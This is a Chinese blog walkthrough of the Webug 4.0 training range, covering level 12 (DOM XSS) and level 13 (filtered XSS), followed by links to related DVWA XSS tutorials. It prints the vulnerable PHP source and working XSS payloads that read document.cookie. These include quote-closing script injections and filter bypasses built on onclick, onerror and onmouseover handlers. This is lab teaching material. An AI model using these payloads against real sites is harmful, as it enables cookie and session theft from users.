Webug4.0靶场通关笔记09- 第12关DOM型XSS和第13关过滤型XSS

于 2025-05-02 20:03:17 发布
阅读量564 收藏 18
点赞数 22
分类专栏: webug靶场 文章标签: 网络 webug靶场 XSS漏洞 DOM型XSS 过滤型XSS XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/147671585
版权

目录

第12关 DOM型XSS

1.DOM型XSS

2.打开靶场

3.源码分析

4.渗透实战

(1)闭合方法1

(2)闭合方法2

第13关 过滤型XSS

1.打开靶场

2.源码分析

3.渗透实战

(1)渗透方法1

(2)渗透方法2

(3)渗透方法3

本文通过《webug靶场第12关 DOM型XSS和13关 过滤型XSS》来进行渗透实战。

第12关 DOM型XSS

1.DOM型XSS

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。基于DOM文档对象模型的一种漏洞。

在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

DOM XSS的XSS代码并不需要服务器解析响应的直接参与,触发XSS靠的就是浏览器端的DOM解析,可以认为完全是客户端的事情,无法通过WAF防护

2.打开靶场

http://192.168.71.129:8006/control/xss/dom_xss.php

随手输入hello,在页面中邮件元素,搜索框中输入hello查询,找到如下内容

 将这段内容打印出来,如下所示尝试构造闭合

<input name="search" value="hello" required="" type="text">

 value输入参数的闭合方式为前面为">,右面闭合方式为"<如下所示

<input name="search" value="hello" required="" type="text">

 故而对这个注入语句 <script>alert(document.cookie)</script>构造闭合

(1)闭合方法1

" > <script>alert(document.cookie)</script>#

(2)闭合方法2

" > <script>alert(document.cookie)</script><name="

3.源码分析

如下所示,根据源码如果search传入的内容包含获取cookie的alert函数调用的XSS注入语句,即会返回flag

<?php


require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
setcookie("flag", "", time() - 1);
if (isset($_POST["search"])) {
    if (!empty($_POST['search'])) {
        if (strstr($_POST['search'], 'alert')){
            $sql = "SELECT * FROM env_list WHERE envName LIKE '%DOM型xss%'";
            $res = $dbConnect->query($sql);
            $row = mysqli_fetch_assoc($res);
            setcookie("flag", $row['envFlag']);
        }
    }
}
require_once TPMELATE."/dom_xss.html";

4.渗透实战

(1)闭合方法1

构造注入命令

" > <script>alert(document.cookie)</script>#

输入命令到search框内

 如下所示,渗透成功g

(2)闭合方法2

构造注入命令

" > <script>alert(document.cookie)</script><name="

输入命令到search框内

 如下所示,渗透成功

第13关 过滤型XSS

1.打开靶场

http://192.168.71.129:8006/control/sqlinject/filter_injection.php

修改id内容为hello

很明显漏洞与反射型XSS漏洞类型,很可能有XSS注入漏洞,接下来尝试注入第13关卡的方式注入

id=<script>alert(document.cookie)</script>

 不过却渗透时吧,提示请不要包含恶意函数,看来有关键字过滤。

2.源码分析

如下所示,输入参数为id,当参数包含alert的XSS注入语句时,将flag放入到cookie中。如下所示对参数id进行小写处理,并且包含script关键字时被过滤

<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
setcookie("flag", "", time() - 1);
if (isset($_GET["id"])) {
    if (!empty($_GET["id"])) {
        $id = strtolower($_GET['id']);
        if (strstr($id, 'script')) {
            header("Content-type:text/html;charset=utf-8");
            echo "<script>alert('请不要包含恶意函数')</script>";exit();
        }elseif (strstr($_GET['id'], 'alert')){
            $sql = "SELECT * FROM env_list WHERE id = 9";
            $res = $dbConnect->query($sql);
            $row = mysqli_fetch_assoc($res);
            setcookie("flag", $row['envFlag']);
        }

    }
}
require_once TPMELATE."/xss_1.html";

输入参数为id,根据提示应该构造如下注入命令

<script>alert(document.cookie)</script>

很明显因为如下代码会注入失败

if (strstr($id, 'script')) {
            header("Content-type:text/html;charset=utf-8");
            echo "<script>alert('请不要包含恶意函数')</script>";exit();
        }

通常来将script关键字被过滤,会考虑大小写绕过,比如如下方式

<Script>alert(document.cookie)</sCript>

不过因为如下源码,将参数id的内容小写后再过滤

$id = strtolower($_GET['id']);

 故而也会渗透失败

故而在渗透过程中,需要考虑使用无script关键字的XSS注入语句

$id = strtolower($_GET['id']);

3.渗透实战

(1)渗透方法1

考虑使用无script关键字的XSS注入语句,那么我们使用onclick的XSS脚本,如下所示

<li/onclick=alert(document.cookie)>ljn</li>

完整url如下所示

http://192.168.71.1/webug4/control/xss/filter_xss.php?id=<li/onclick=alert(document.cookie)>ljn</li>

如下点击ljn,注入成功

(2)渗透方法2

利用img标签和onerror配合来进行绕过,由于页面不存在路径为/1的图片,因此直接加载会出错,触发onerror并且执行代码

<img src=1 onerror=alert(document.cookie)>

注入语句 如下所示,

http://192.168.71.129:8006/control/xss/filter_xss.php?id=<img src=x onerror=alert(document.cookie)>

渗透获取到flag

(3)渗透方法3

利用img标签和onmouseover配合来进行绕过

<img src=x onmouseover=alert(document.cookie)>

注入语句 如下所示,

http://192.168.71.129:8006/control/xss/filter_xss.php?id=<img src=x onmouseover=alert(document.cookie)>

将鼠标移动到图标处

如下所示弹出XSS注入命令,获取到flag

DVWA——xss 通关教程
weixin_45960266的博客
12-07 1万+
xss注入的场景是一些论坛的留言板之类的,攻击者利用网页的漏洞写入程序脚本,当用户浏览的时候就会触发这个脚本。 reflected的xss只能是一次性的,而stored的xss是永久的,写入到留言板之后,就传入到服务器当中,当再有用户浏览时就会触发。 xss跟sql是非常想象的,最大的区别在于xss是前段,而sql是后端。且,xss很难获得webshell。 reflected xss low 查看源代码,发现对于输入没有要求,所以直接写入入选xxs就可以了 先设置难度为low 查看源码 发现没有任.
Webug4.0靶场通关笔记(第五天)--------9-13
Yasso的博客
02-23 1356
一、反射XSS 二、存储XSS 三、万能密码登陆 四、DOMxss 五、过滤xss 一、反射XSS 跨站脚本(XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种,允许恶意用户将代码注入网页,这类攻击常包含HTML用户端脚本语言。 这道题没有过滤。 经测试发现,标红的地方1是我们可以注入的点 我们测试发现,可以注入代码标签 <script>alert(123)</script> 我们获取一下cookie <script>.
DVWA XSS (DOM) 通关教程
weixin_30703911的博客
08-20 1221
DOM,全称Document Object Model,是一个平台语言都中立的接口,可以使程序脚本能够动态访问更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元...
DVWA-XSS 级别通关详解(图文详细)
m0_60884805的博客
10-18 4338
学过html语言的我们都知道都是双标签,也就是说会识别两个标签之间的语句,那么我们就人为把它闭合起来,在执行过程中,一旦存在一对标签,那么就会执行这里面的语句,无法构成成对标签的不会执行里面的语句,而是单标签,也就是说他要执行的语句涵盖在它里面。>闭合前面
DVWA靶场XSS通关详解
qq_62169455的博客
06-27 1696
里面的任意字母改为大写即可),此处也可以通过双写(即写两个嵌套的script)来绕过,即在输入框里面输入代码: alert("GXY")
DVWA靶场通关----(11) XSS(Reflected)教程
z09364517158的博客
04-02 655
反射XSS的触发有后端的参与,而之所以触发XSS是因为后端解析用户在前端输入的带有XSS性质的脚本或者脚本的data URI编码,后端解析用户输入处理后返回给前端,由浏览器解析这段XSS脚本,触发XSS漏洞。基本原理就是通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特定的代码参数会被HTML解析,执行,如此就可以获取用户的COOIKE,进而盗号登陆。XSS反射攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。需要向web页面注入恶意代码;
xss-labs 通关笔记
Ewige的博客
06-30 588
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射性XSS; 反射XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
DVWA靶场xss通关笔记,详解带截图
AboutLzs的博客
03-21 1684
DVWA靶场Xss通关笔记
pikachu靶场通关笔记(一)
m0_60716947的博客
10-16 960
换句话说,攻击者可以在同一个会话下,在获得第一个验证码后,后面不再主动触发验证码生成页面,并且一直使用第一个验证码就可循环进行后面的表单操作,从而绕过了验证码的屏障作用,对登录进行暴力猜解。上面他就会弹窗,最后的>是为了闭合这个a标签。这里我们抓包,账号密码随便输,但是验证码要输对,放到重放模块,但是不要拦截请求闭,这是为了防止页面刷新导致服务器那边的验证码更新。这样点击后就会跳转到xss(get) 那题的页面,并会弹出1的弹窗,如果你有自己的xss平台的话就可以打cookie了,详情可见。
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2776
xss学习笔记
DVWA 通关XSS (DOM)
干铮的博客
08-01 2052
DomXSS DomXSS是一种XSS攻击,其中攻击的代码是由于受害者浏览器页面的DOM树而执行的特殊的地方就是代码攻击(payload) 在浏览器本地修改Dom树而执行,并不会将payload上传到服务器,这也使得DOMXSS比较难以检测 Low 简单难度没有参数过滤,直接修改下拉框上传参数的值 default=<script>alert(/xss/)</script> Medium 过滤了<script>标签 闭合</option&gt
DVWA XSS (Stored) 通关教程
weixin_30703911的博客
08-20 1250
Stored Cross Site Scripting 存储XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。 Low Security Level DVWA XSS (Stored) 通关教程 W...
DVWA XSS (Reflected) 通关教程
weixin_30703911的博客
08-20 631
XSS 介绍XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSSDOMXSS由于其特殊...
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储 XSS)
YueXuan_521的博客
09-19 1245
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储 XSS)
DVWA靶场通关XSS
m0_56010012的博客
03-22 9758
XSS漏洞 跨站脚本攻击(Cross Site Scripting),为了不层叠样式表(Cascading Style Sheets,缩写:CSS)混淆,所以架构跨站脚本攻击缩写为XSSXSS就是攻击者在web页面插入恶意的Script代码,当用户浏览该页面时,嵌入其中的js代码会被执行,从而达到恶意攻击的目的。某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚
DVWA通关教程
qq_45756971的博客
11-24 8137
Brute Force(暴力(破解)) Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。 low: 先审计代码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass =
【dvwa靶场XSS系列】XSS (Stored)低--高级别,通关
m0_47484034的博客
11-05 509
【dvwa靶场XSS系列】XSS (Stored)低--高级别,通关
DVWA靶场通关——反射性XSS漏洞
最新发布
sucker的博客
12-02 1860
它发生在Web应用程序将用户输入的数据(如URL中的查询参数、HTTP头部、表单输入等)直接反射到HTML响应中,而没有经过适当的过滤转义,导致攻击者的恶意脚本在受害者浏览器中执行。例如,攻击者通过XSS窃取用户的会话Cookie或身份认证信息,并用这些信息发起恶意请求(如修改用户的账户信息或进行资金转账)。3,可以看到通过各种过滤手段是能够实现对<script>标签限制过滤的绕过,其本质就是要让服务器端去“傻傻的”执行我们注入的恶意代码,javascript丰富的功能标签为我们的绕过提供了可能。
网络安全 DVWA通关指南 DVWA DOM Based Cross Site Scripting (DOM XSS)
YueXuan_521的博客
08-10 640
网络安全 DVWA通关指南 DVWA DOM Based Cross Site Scripting (DOM XSS) 就会导致跨站脚本漏洞。2、在注入的 payload 中加入注释符 “#”,注释后边的内容不会发送到服务端,但是会被前端代码所执行。Dom返回页面源码中看不到输入的payload, 而是保存在浏览器的DOM中。2、构造闭合"option""select"标签,执行弹出"/xss/"的语句。DOM与反射类似,都需要攻击者诱使用户点击专门设计的URL;增加对"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值